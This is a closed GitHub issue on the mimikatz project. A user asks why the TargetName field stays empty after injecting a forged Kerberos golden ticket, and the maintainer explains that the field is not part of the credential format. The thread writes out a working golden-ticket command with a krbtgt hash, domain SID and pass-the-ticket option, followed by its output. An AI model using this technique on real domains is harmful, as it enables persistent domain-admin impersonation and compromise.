search

gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.28k stars 3.69k forks source link

TargetName on kerberos tickets injections #109

Closed tomkahana closed 6 years ago

tomkahana commented 6 years ago

Hi Kiwi! I have windows 10 Enterprise N, using mimikatz 2.1.1. Running mimikatz under admin privileges.

I'm injecting golden ticket by the command: kerberos::golden /admin:user1 /domain:ACME2.COM /sid:S-1-5-21-3657242463-3937142114-3749652718-1428 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:acme2.com.kirbi /ptt

User      : user1
Domain    : ACME2.COM (ACME2)
SID       : S-1-5-21-3657242463-3937142114-3749652718-1428
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: 6194bd1a5bf3ecd542e8aac9860bddf0 - rc4_hmac_nt      
Lifetime  : 11/11/2017 6:47:12 PM ; 11/9/2027 6:47:12 PM ; 11/9/2027 6:47:12 PM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'user1 @ ACME2.COM' successfully submitted for current session

It works well and the ticket is injected. However, I noticed that TargetName is not like Service Name, as you can see:

Group 2 - Ticket Granting Ticket
 [00000000]
   Start/End/MaxRenew: 11/11/2017 6:47:12 PM ; 11/9/2027 6:47:12 PM ; 11/9/2027 6:47:12 PM
   Service Name (02) : krbtgt ; ACME2.COM ; @ ACME2.COM
   **Target Name  (--) : @ ACME2.COM**
   Client Name  (01) : user1 ; @ ACME2.COM
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ; 
   Session Key       : 0x00000017 - rc4_hmac_nt      
     b9cef01e6e653cf148b0e4ff9ac0b937
   Ticket            : 0x00000017 - rc4_hmac_nt       ; kvno = 2    [...]

where a real TGT looks like:

Group 2 - Ticket Granting Ticket
 [00000000]
  Start/End/MaxRenew: 11/11/2017 6:57:43 PM ; 11/12/2017 4:57:43 AM ; 11/18/2017 6:57:43 
  Service Name (02) : krbtgt ; ACME2.COM ; @ ACME2.COM
  **Target Name  (02) : krbtgt ; ACME2 ; @ ACME2.COM**
  Client Name  (01) : user1 ; @ ACME2.COM ( ACME2 )
  Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ; 
  Session Key       : 0x00000012 - aes256_hmac      
  56b4e9488f086a75b1c68abd703327de66cfbb35df95a7f275f52107fdb9c2f2
  Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2 [...]

I looked at the code and I noticed that _KERB_RETRIEVE_TKT_REQUEST contain TargetName while KERB_SUBMIT_TKT_REQUEST doesn't.

How can I force TargetName to be populated on the injection?

Thank you very much, and let me know additional data you need Tom

gentilkiwi commented 6 years ago

TargetName is not a "KRB-CRED" field. I only display it because it was populated in memory by LSASS. It's exactly like the "missing" KDC called field with klist.

In all cases, it's not needed at all to make it works :)